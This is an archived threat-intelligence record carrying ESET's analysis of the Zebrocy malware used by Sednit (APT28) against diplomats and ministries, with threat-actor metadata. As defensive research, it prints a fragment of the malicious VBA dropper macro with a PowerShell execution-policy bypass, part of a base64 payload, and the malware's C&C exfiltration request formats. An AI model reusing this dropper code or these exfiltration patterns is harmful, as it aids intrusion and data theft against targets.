{
	"id": "90189a22-e545-4ceb-acda-dcca6538a516",
	"created_at": "2026-04-06T00:06:47.105499Z",
	"updated_at": "2026-04-10T13:13:01.568202Z",
	"deleted_at": null,
	"sha1_hash": "54076ab6dafbe71c62a7f91882ac8db25a37562a",
	"title": "Sednit update: Analysis of Zebrocy",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 896084,
	"plain_text": "Sednit update: Analysis of Zebrocy\r\nBy ESET Research\r\nArchived: 2026-04-05 15:40:02 UTC\r\nThe Sednit group – also known as APT28, Fancy Bear, Sofacy or STRONTIUM – is a group of attackers operating since 2004, if not earlier, whose main objective is to steal confidential information from specific targets.\r\nToward the end of 2015, we started seeing a new component being deployed by the group: a downloader for the main Sednit backdoor, Xagent. Kaspersky mentioned this component for the first time in 2017 in their APT trend report and recently wrote an article where they briefly described it under the name Zebrocy.\r\nThis new component is a family of malware, comprising downloaders and backdoors written in Delphi and AutoIt. These components play the same role in the Sednit ecosystem as Seduploader — that of first-stage malware.\r\nVictims we have seen targeted by Zebrocy are located in Azerbaijan, Bosnia and Herzegovina, Egypt, Georgia, Iran, Kazakhstan, Korea, Kyrgyzstan, Russia, Saudi Arabia, Serbia, Switzerland, Tajikistan, Turkey, Turkmenistan, Ukraine, Uruguay and Zimbabwe. These targets include embassies, ministries of foreign affairs, and diplomats.\r\nThe Zebrocy family consists of three components. In the order of deployment these are a Delphi downloader, an AutoIt downloader and a Delphi backdoor. Figure 1 shows the relationship between these components.\r\nIn this article we describe this family and how it can coexist with the older Seduploader reconnaissance tools. We will talk about some similarities to and differences from Downdelph at the end.\r\nhttps://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/\r\nPage 1 of 15\r\nFigure 1: The Sednit ecosystem\r\nFigure 1 shows the attack methods and active malware used by Sednit. Email attachments are the main entry point to the Sednit ecosystem. DealersChoice is still being used, as research from Palo Alto Networks mentioned in this recent blogpost. Both Seduploader and Zebrocy are actively being delivered by the Sednit group through email attachments. Finally, after a reconnaissance phase, Xagent and Xtunnel are deployed on the targets deemed interesting by the operators.\r\nAttack methods\r\nThe first component of a Zebrocy-based attack arrives as an email message. Victims are lured into opening email attachments that can be either Microsoft Office documents or an archive.\r\nMalicious documents\r\nMalicious documents used by Sednit download the first stage payload via Visual Basic for Applications (VBA), exploits or even using Dynamic Data Exchange (DDE).\r\nAt the end of 2017, the Sednit group launched two campaigns delivering two different malicious documents. The first was named Syria - New Russia provocations.doc and the second named Note Letter Mary Christmas Card.doc.\r\nFigure 2: Zebrocy’s malicious documents\r\nBoth malicious documents contain a VBA macro that creates a randomly-named file in %TEMP%. The malware executable is then decoded and written into this file, which is then executed via a PowerShell command or via Scriptable Shell Objects.\r\n[...]\r\nSub AutoClose()\r\nOn Error Resume Next\r\nvAdd = \"\"\r\nFor I = 1 To 8\r\nvAdd = vAdd + Chr(97 + Rnd(20) * 25)\r\nNext\r\nvFileName = Environ(\"temp\") \u0026 \"\\\" + vAdd \u0026 \".e\" + \"x\" \u0026 \"e\"\r\nSaveNew vFileName, UserForm1.Label1.Caption\r\nApplication.Run \"XYZ\", vFileName, \"WScript.Shell\"\r\nEnd Sub\r\nPublic Function XYZ(vF, vW)\r\nvStr = \"powershell.exe -nop -Exec Bypass -Command Start-Process '\" + vF + \"';\"\r\nCall CreateObject(vW).Run(vStr, 0)\r\nEnd Function\r\n[...]\r\nTVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2lu\r\n[...]\r\nExample of Visual Basic function and base64 encoded first stage from the Syria - New Russia provocations.doc document.\r\nArchives\r\nSome campaigns have used an archive to drop the first stage on the victim computer, rather than Office document macros. The archive is presumably delivered as an email attachment.\r\nAll first stages of the Zebrocy family are executables with an icon and a document-like filename intended to trick the victim, as shown in Figure 3.\r\nFigure 3: Zebrocy first stage using a Word document icon\r\nDelphi downloader\r\nA Delphi downloader is the first stage of the Zebrocy family, although we have seen some campaigns from the Sednit group using the AutoIt stage directly without using this downloader. Most of these Delphi downloader binaries use Office document icons or other icons like Windows library, and sometimes these samples are packed with UPX. The purpose of this stage is quite straightforward: it retrieves a maximum of information from the victim's computer.\r\nWhen the malware is launched, a splash window pops up with a bogus error message and the filename of the dropped binary. For example, if the filename is srsiymyw.exe, the filename that appears in the splash window will be srsiymyw.doc (see Figure 4). The pop-up’s purpose is to distract the user so that he won't think anything unusual is happening on his computer.\r\nFigure 4: Delphi downloader splash window\r\nIn fact, the downloader is busy creating a file under %TEMP% with a filename hardcoded in the binary (although at this stage, the file is empty). Persistence is implemented by adding a Windows registry entry under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ with the path of the hardcoded filename.\r\nTo gather information, the malware creates a new process using the Windows API CreateProcess function with cmd.exe /c SYSTEMINFO \u0026 TASKLIST as the lpCommandLine argument. Once the information is retrieved, it sends the result via an HTTP POST request to the C\u0026C server hardcoded in the binary. It retries until it receives the next stage.\r\nPOST (\\/[a-zA-Z0-9\\-\\_\\^\\.]*){3}\\.(php|dat)?fort=\u003cSerialNumber_C\u003e HTTP/1.0\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: xxxx\r\nHost: \u003cip_address\u003e\r\nAccept: text/html, */*\r\nAccept-Encoding: identity\r\nUser-Agent: Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1\r\npol=MM/DD/YYYY%20HH:MM:SS%20(AM|PM)%0D%0A\u003cDriveListing\u003e%0D%0A%0D%0A\u003cPath_to_the_binary\u003e%0D%0A%0D%0A\u003cSYSTEMINFO \u0026\r\n[...]\r\nDelphi downloader HTTP POST request\r\nOnce the request has been sent, the C\u0026C server responds by sending the next stage, if the target is considered interesting by the operator. The time elapsing between the sending of the report and the receipt of the payload is a few hours. This next stage is written into the file created earlier and executed.\r\nAutoIt downloader\r\nThe AutoIt downloader is another layer of the reconnaissance phase during an infection of the victim computer. From this point onwards, two scenarios are possible: in the first one, the Delphi downloader is the first stage and the second stage – which is the AutoIt downloader – is a lightweight downloader. In the other scenario, the AutoIt downloader is the first stage and it has all the functionalities of the Delphi downloader and even more.\r\nWhen the AutoIt downloader is the first stage it performs many reconnaissance functions. Even if this one shares some similarities with the Delphi downloader, such as the persistence mechanism and the splash window, it adds more granularity to the reconnaissance phase than that of the Delphi downloader. Here is a non-exhaustive list of its capabilities:\r\nDetect sandbox and virtual environment\r\nGet list of installed software (via HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall)\r\nGet Windows version (32-bit or 64-bit)\r\nGet the process list\r\nGet hard drive information\r\nGet screenshot\r\nGet various information about the victim computer using Windows Management Instrumentation (WMI) objects, probably inspired by code from this GitHub repository\r\nDepending on the previous stage, the name of the AutoIt binary is different. If the malware is dropped as the first stage, it has a document-like name. Otherwise it is given the name hardcoded in the Delphi downloader, as shown in Table 1.\r\nTable 1: AutoIt binary filenames, depending on the first stage\r\nFirst stage | AutoIt binary filename\r\nDelphi downloader | csrsvc.exe\r\nEmail attachment | Protocol List_20160606.exe\r\nThe purpose of this stage is more or less the same as the previous one. There are many different versions in the wild but all of them include at least the code to achieve the following:\r\nRetrieve the serial number of the hard drive C:\r\nUse network functions from winhttp.dll or winhttp.au3\r\nExecute the payload received from the C\u0026C server\r\nIn the same way that the Delphi downloader has a splash window, the AutoIt downloader also has a splash window when it comes from an email attachment – that is, when the AutoIt downloader is the first stage. The splash screen is related to the binary icon. For example, an AutoIt downloader with Adobe Reader as an icon displays a splash screen saying that the PDF file the victim would be expecting to be displayed is corrupted. An AutoIt binary with a Word icon will display the following popup asking for a password. The password is not checked; we think it’s just a way to distract the victim from the code’s real malicious activity.\r\nFigure 5: AutoIt downloader Word popup\r\nDelphi backdoor\r\nThe Delphi backdoor is the final stage of the Zebrocy chain of components. We have seen Zebrocy downloading the Sednit group’s flagship backdoor, Xagent, in the past.\r\nUnlike the previous components, this one has an internal version number that doesn’t seem to be related to a specific campaign. This version number has evolved over time, as shown in Table 2:\r\nTable 2: Delphi backdoor internal version history\r\nPE timestamp | Version\r\n2015-12-28 | 2.1\r\n2016-01-06 | 2.2\r\n2016-01-25 | 2.3\r\n2016-02-03 | 2.4\r\n2016-03-14 | 2.5\r\n2016-04-08 | 3.0\r\n2016-04-26 | 3.2\r\n2016-06-01 | 4.4\r\n2016-09-08 | 5.0\r\n2016-12-15 | 5.1\r\n2017-06-01 | 7.0\r\n2017-09-26 | 8.0\r\n2017-10-12 | 8.1\r\n2017-11-12 | 8.2\r\n2017-12-26 | 8.5\r\n2018-01-09 | 8.6\r\n2017-12-18 | 10.1\r\n2018-01-09 | 10.2\r\n2018-01-16 | 10.3\r\n2018-01-18 | 11.0\r\n2018-02-07 | 12.0\r\n2018-03-05 | 13.0\r\n2018-03-06 | 13.1\r\n2018-03-14 | 14.0\r\n2018-03-28 | 14.1\r\nNotice that we don’t have full visibility and we may have missed some versions of the backdoor. Besides, there is some overlap between versions, meaning that some older versions are still used at the same time as newer versions.\r\nIn the next few paragraphs we will highlight some differences seen in the malware during its evolution.\r\nThe backdoor embeds a block of configuration. The configuration values change from one sample to another, but the list of configurable items stays the same. However, the way in which the configuration data are stored in the malware sample has evolved over time.\r\nThe first versions of the backdoor embedded the configuration data in plaintext, as shown in Figure 6.\r\nFigure 6: Delphi backdoor plaintext configuration data\r\nThen, in later versions, the malware’s authors encoded the configuration data as hexadecimal strings, as shown in Figure 7.\r\nFigure 7: Delphi backdoor encoded configuration data\r\nIn the latest versions, the configuration data is encrypted in the resources using the AES algorithm. Older versions stored it in the .text section.\r\nThe configuration data contains:\r\nAES keys to communicate with the C\u0026C server\r\nURLs with paths differing from one sample to another\r\nThe version of the malware\r\nThe Windows registry key/value that ensures the persistence of the backdoor\r\nPath where temporary files are stored (%APPDATA%)\r\nThe names of hidden directories to be created to store temporary files: the directory filenames are concatenated with the environment variable (%APPDATA%)\r\nOnce the malware is set up, it executes callback functions via the Windows API function SetTimer. These callbacks allow the operator to handle many features and commands of the backdoor:\r\nTake a screenshot of the Desktop of the victim\r\nCapture keystrokes\r\nList drives/network resources\r\nRead/write into Windows registry\r\nCopy/move/delete a file system object\r\nExecute files or create scheduled tasks\r\nThe number of commands handled by the backdoor – about 30 – differs from one version to another.\r\nTo communicate with the C\u0026C server, the backdoor stores the report of these functions into a temporary file. Then it reads the content of the temporary file and sends it on. These temporary files are stored in one of the hidden directories created during the set-up phase.\r\nPOST (\\/[a-zA-Z0-9\\-\\_\\^\\.]*){3}\\.(php|dat). HTTP/1.0\r\nConnection: keep-alive\r\nContent-Type: multipart/form-data; boundary=--------\u003cmmddyyhhnnsszzz\u003e\r\nContent-Length: \u003cN\u003e\r\nHost: \u003cip_address\u003e\r\nAccept: text/html, */*\r\nAccept-Encoding: identity\r\nUser-Agent: Mozilla/3.0 (compatible; Indy Library)\r\n----------\u003cmmddyyhhnnsszzz\u003e\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"%APPDATA%\\Microsoft\\\u003cdirectories\u003e\\\u003ctempfilename\u003e.tmp\"\r\nContent-Type: \u003ctempfilename_hex_encoded\u003e.tmp\r\n\u003ctempfilename content\u003e\r\n----------\u003cmmddyyhhnnsszzz\u003e--\r\nDelphi backdoor POST request\r\nThe tempfilename content is the output of whichever commands are executed. The content is encrypted using the AES-256-ECB algorithm with the first AES key from the configuration data, then the output is hexadecimal encoded. The contents sent to the C\u0026C server vary from one command to another, but all contain at least the HDD serial number and the first four bytes of the computer name.\r\nFor example, HELLO corresponds to the first packet sent by the backdoor to establish contact with the C\u0026C server. As shown below, it contains the date when the task was launched, the Delphi backdoor’s internal version number, the HDD serial number, the computer name (first four bytes), the command and the date when the backdoor was executed.\r\nStart: 1/4/2018 1:37:00 PM - [\u003cvx.x\u003e]:42424242ESET-HELLO-[2018-04-04 01-37-00]-315.TXT.\r\nThe second AES key in the configuration data is used to decrypt the answer from the C\u0026C server.\r\nLike Seduploader, this backdoor is used to deploy Xagent on victim machines apparently deemed “interesting” by the operators after the reconnaissance phase.\r\nSummary\r\nA component written in Delphi is nothing new for the Sednit group, which has already used this language for Downdelph. However, even if this latest component has nothing else in common with Downdelph “technically speaking”, there are some points of interest worth mentioning.\r\nThe deployment methods are the same, both being delivered as an email attachment.\r\nWe saw Downdelph for the last time in September 2015, and the first sample of Zebrocy we saw in the wild was dated November 2015.\r\nBoth are written in Delphi.\r\nWe can hypothesize that the Sednit group abandoned one component and started to develop a new one. One thing that doesn’t change for the group, however, is the mistakes they made:\r\nThe name of the scheduled task: Windiws\r\nThe function name that retrieves system information in the AutoIt downloader is _SOFWARE()\r\nMary instead of Merry in Note Letter Mary Christmas Card.doc\r\nThe byte arrays used by the Delphi backdoor as AES-256 keys are 38 bytes long instead of 32 bytes. It’s not a spelling error but probably due to a lack of attention.\r\nWe have seen Zebrocy being heavily used by the Sednit group over the last two years. Our analysis of the many new variants that have appeared on a regular basis since 2017 clearly indicates that Zebrocy is being actively maintained and improved by its author(s). We can consider it one of the stable, mature tools in Sednit's arsenal, a tool that deserves to be monitored closely.\r\nIoCs\r\nMalicious documents\r\nSHA-1 | ESET Detection name | Filename\r\n4f07d18475601d0492cbf678ee0f0860c729910e | VBA/TrojanDropper.Agent.YC | Note Letter Mary Christmas Card.doc\r\nf10b2c052afc07e2dec9dbe816031059fdc900ba | VBA/TrojanDropper.Agent.AAK | Syria - New Russia provocations.doc\r\nDelphi downloader\r\nAutoIt downloader\r\nDelphi backdoor\r\nURLs\r\nSource: https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/"
	],
	"report_names": [
		"sednit-update-analysis-zebrocy"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434007,
	"ts_updated_at": 1775826781,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/54076ab6dafbe71c62a7f91882ac8db25a37562a.pdf",
		"text": "https://archive.orkl.eu/54076ab6dafbe71c62a7f91882ac8db25a37562a.txt",
		"img": "https://archive.orkl.eu/54076ab6dafbe71c62a7f91882ac8db25a37562a.jpg"
	}
}